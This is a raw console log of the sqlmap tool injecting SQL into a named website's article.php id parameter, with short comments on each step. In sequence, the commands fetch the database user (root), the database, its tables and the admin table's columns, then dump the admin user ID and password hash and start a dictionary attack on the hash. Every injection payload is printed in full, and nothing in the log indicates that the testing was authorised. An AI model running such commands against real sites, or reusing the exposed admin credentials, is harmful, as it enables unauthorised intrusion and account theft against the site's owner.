D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>